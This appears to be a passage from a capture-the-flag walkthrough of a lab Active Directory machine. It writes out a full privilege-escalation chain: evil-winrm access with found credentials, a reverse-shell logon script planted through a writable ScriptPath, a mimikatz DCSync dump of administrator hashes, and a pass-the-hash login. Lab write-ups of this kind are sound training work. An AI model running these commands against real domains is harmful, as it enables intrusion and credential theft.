 

Shell

Validate Creds

The creds work over SMB:

puck@kali$ netexec smb blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
SMB         10.10.11.22     445    DC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.22     445    DC1              [+] blazorized.htb\rsa_4810:(Ni7856Do9854Ki05Ng0005 #)

They also work over WinRM:

puck@hkali$ netexec winrm blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
WINRM       10.10.11.22     5985   DC1              [*] Windows 10 / Server 2019 Build 17763 (name:DC1) (domain:blazorized.htb)
WINRM       10.10.11.22     5985   DC1              [+] blazorized.htb\rsa_4810:(Ni7856Do9854Ki05Ng0005 #) (Pwn3d!)

I could also see this from the shell as nu_1055 as rsa_4810 is in the Remote Management Users group:

PS C:\programdata> net user rsa_4810
User name                    RSA_4810
Full Name                    RSA_4810
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/25/2024 12:55:59 PM
Password expires             Never
Password changeable          2/26/2024 12:55:59 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   2/2/2024 12:44:30 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Remote_Support_Admini
The command completed successfully.

Evil-WinRM

I’ll connect with evil-winrm:

puck@kali$ evil-winrm -i blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents>

Shell as SSA_6010

Enumeration

Groups

rsa_4810 is a member of a unique group, Remote_Support_Administrators:

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Remote_Support_Administrators    Group            S-1-5-21-2039403211-964143010-2924010611-1115 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Writable Directories

accesschk from Sysinternals is a nice way to check for writable directories. I’ll check for any in C:\Windows, and it finds a bunch:

*Evil-WinRM* PS C:\programdata> .\accesschk64 /accepteula -uwds blazorized\rsa_4810 C:\Windows

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

RW C:\Windows\Tasks
RW C:\Windows\tracing
RW C:\Windows\Registration\CRMLog
 W C:\Windows\System32\Tasks
RW C:\Windows\System32\spool\drivers\color
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\21FDFAAFC1D0
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\DE3FC3AD20F0
RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\EA1EBECD3ADA
...[snip]...

 

There’s a ton of output, but the important bit is that rsa_4810 seems to have full control over these two directories:

*Evil-WinRM* PS C:\> icacls \Windows\SYSVOL\domain\scripts\A32FF3AEAA23
\Windows\SYSVOL\domain\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
                                            BLAZORIZED\Administrator:(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\> icacls \Windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23
\Windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
BLAZORIZED\Administrator:(OI)(CI)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
                                                           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                           BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                           BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files

These are the directories typically used to store logon, logoff, startup, and shutdown scripts applied to users and computers in the domain.

Users

The only remaining users with home directories are ssa_6010 and administrator. Looking at bit more closely, I’ll see that Bloodhound reports that ssa_6010 has a session on DC1:

The Last Logon time is also today, within a few minutes of the Bloodhound collection:

PowerShell can show this as well:

*Evil-WinRM* PS C:\> [DateTime]::FromFileTime((Get-ADUser SSA_6010 -properties LastLogon).LastLogon)
Friday, November 1, 2024 8:36:43 AM
*Evil-WinRM* PS C:\> date
Friday, November 1, 2024 8:37:11 AM

It seems that ssa_6010 logs on every minute.

Logon Script

The SSA_6010 user doesn’t have any logon script set in their active directory configuration information:

*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 -properties ScriptPath

DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled           : True
GivenName         :
Name              : SSA_6010
ObjectClass       : user
ObjectGUID        : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName    : SSA_6010
ScriptPath        :
SID               : S-1-5-21-2039403211-964143010-2924010611-1124
Surname           :
UserPrincipalName : SSA_6010@blazorized.htb

However, RSA_4810 is able to set one:

*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 | Set-ADUser -ScriptPath puck
*Evil-WinRM* PS C:\users> Get-ADUser SSA_6010 -properties ScriptPath

DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled           : True
GivenName         :
Name              : SSA_6010
ObjectClass       : user
ObjectGUID        : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName    : SSA_6010
ScriptPath        : puck
SID               : S-1-5-21-2039403211-964143010-2924010611-1124
Surname           :
UserPrincipalName : SSA_6010@blazorized.htb

Another way to find this while enumerating is with the Find-InterestingDomainAcl commandlet from PowerView.ps1. If I run it and filter for ones that come from RSA_4810, I’ll see that this user has WriteProperty access to SSA_6010’s Script-Path:

*Evil-WinRM* PS C:\programdata> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}


ObjectDN                : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : WriteProperty
ObjectAceType           : Script-Path
AceFlags                : None
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2039403211-964143010-2924010611-1107
IdentityReferenceName   : RSA_4810
IdentityReferenceDomain : blazorized.htb
IdentityReferenceDN     : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
IdentityReferenceClass  : user

Execution

Strategy

Logon scripts are specified relative to the scripts directory above. I’m going to set that path to something like A32FF3AEAA23\puck.bat, and then write that script into place as a reverse shell. When SSA_6010 logs in, it’ll execute and I’ll get a shell.

Payload

I’ll grab a PowerShell #3 (Base64) reverse shell from revshells.com and write it to a .bat file using Out-File:

*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23> echo "powershell -e JABj...[snip]...CkA" | Out-File -FilePath puck.bat -Encoding ASCII
*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23> ls puck.bat

    Directory: C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        12/2/2025   8:48 AM           1344 puck.bat

There is a cleanup script that deletes these files, so I’ll need to move fast.

Exploit

I’ll set SSA_6010’s ScriptPath:

*Evil-WinRM* PS C:\> Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'A32FF3AEAA23\puck.bat'

In less than a minute, I get a shell at nc:

puck@kali$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.22 53958

PS C:\Windows\system32>

Shell as administrator

Enumeration

SSA_6010 is a member of the Super_Support_Administrators group, which has significant privileges over the domain:

 

Hash Dump

With DCSync privileges, SSA_6010 can dump all the hashes for the domain. I’ve shown this many times before with secrets-dump from my host (most recently on Mist). But in this case, I don’t have creds as the user that I want to dump with. I’ll use MimiKatz.

I’ll upload it to \programdata (I used my Evil-WinRM shell, but Python webserver would work too). It’s an interactive tool when run as .\mimikatz.exe, which in this reverse shell will just hang and/or fail. But I can pass commands in at the command line in the format mimikatz.exe "[command]" "[command]" exit.

The mimikatz command I want is lsadump::dcsync /user:administrator:

PS C:\programdata> .\mimikatz "lsadump::dcsync /user:administrator" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID   : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
    ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
    ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
    ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
    ntlm- 5: b471c416c10615448c82a2cbb731efcb
    ntlm- 6: b471c416c10615448c82a2cbb731efcb
    ntlm- 7: aec132eaeee536a173e40572e8aad961
    ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
    ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: ad37753b9f78b6b98ec3bb65e5995c73
    lm  - 1: c449777ea9b0cd7e6b96dd8c780c98f0
    lm  - 2: ebbe34c80ab8762fa51e04bc1cd0e426
    lm  - 3: 471ac07583666ccff8700529021e4c9f
    lm  - 4: ab4d5d93532cf6ad37a3f0247db1162f
    lm  - 5: ece3bdafb6211176312c1db3d723ede8
    lm  - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
    lm  - 7: 8b3c1950099a9d59693858c00f43edaf
    lm  - 8: a14ac624559928405ef99077ecb497ba

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 36ff197ab8f852956e4dcbbe85e38e17

* Primary:Kerberos-Newer-Keys *
    Default Salt : BLAZORIZED.HTBAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
      aes128_hmac       (4096) : df4dbea7fcf2ef56722a6741439a9f81
      des_cbc_md5       (4096) : 310e2a0438583dce
    OldCredentials
      aes256_hmac       (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
      aes128_hmac       (4096) : db4d9e0e5cd7022242f3e03642c135a6
      des_cbc_md5       (4096) : 1c67ef730261a198
    OlderCredentials
      aes256_hmac       (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
      aes128_hmac       (4096) : 2d9925ef94916523b24e43d1cb8396ee
      des_cbc_md5       (4096) : 9b01158c8923ce68

* Primary:Kerberos *
    Default Salt : BLAZORIZED.HTBAdministrator
    Credentials
      des_cbc_md5       : 310e2a0438583dce
    OldCredentials
      des_cbc_md5       : 1c67ef730261a198

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  7e35fe37aac9f26cecc30390171b6dcf
    02  a8710c4caaab28c0f2260e7c7bd3b262
    03  81eae4cf7d9dadff2073fbf2d5c60539
    04  7e35fe37aac9f26cecc30390171b6dcf
    05  9bc0a87fd20d42df13180a506db93bb8
    06  26d42d164b0b82e89cf335e8e489bbaa
    07  d67d01da1b2beed8718bb6785a7a4d16
    08  7f54f57e971bcb257fc44a3cd88bc0e3
    09  b3d2ebd83e450c6b0709d11d2d8f6aa8
    10  1957f9211e71d307b388d850bdb4223f
    11  2fa495bdf9572e0d1ebb98bb6e268b01
    12  7f54f57e971bcb257fc44a3cd88bc0e3
    13  de0bba1f8bb5b81e634fbaa101dd8094
    14  2d34f278e9d98e355b54bbd83c585cb5
    15  06b7844e04f68620506ca4d88e51705d
    16  97f5ceadabcfdfcc019dc6159f38f59e
    17  ed981c950601faada0a7ce1d659eba95
    18  cc3d2783c1321d9d2d9b9b7170784283
    19  0926e682c1f46c007ba7072444a400d7
    20  1c3cec6d41ec4ced43bbb8177ad6e272
    21  30dcd2ebb2eda8ae4bb2344a732b88f9
    22  b86556a7e9baffb7faad9a153d1943c2
    23  c6e4401e50b8b15841988e4314fbcda2
    24  d64d0323ce75a4f3dcf0b77197009396
    25  4274d190e7bc915d4047d1a63776bc6c
    26  a04215f3ea1d2839a3cdca4ae01e2703
    27  fff4b2817f8298f09fd45c3be4568ab1
    28  2ea3a6b979470233687bd913a8234fc7
    29  73d831d131d5e67459a3949ec0733723


mimikatz(commandline) # exit
Bye!

 

This gives the NTLM hash of the administrator account.

Shell

Evil-WinRM will get a shell as administrator:

puck@kali$ evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And I can grab root.txt: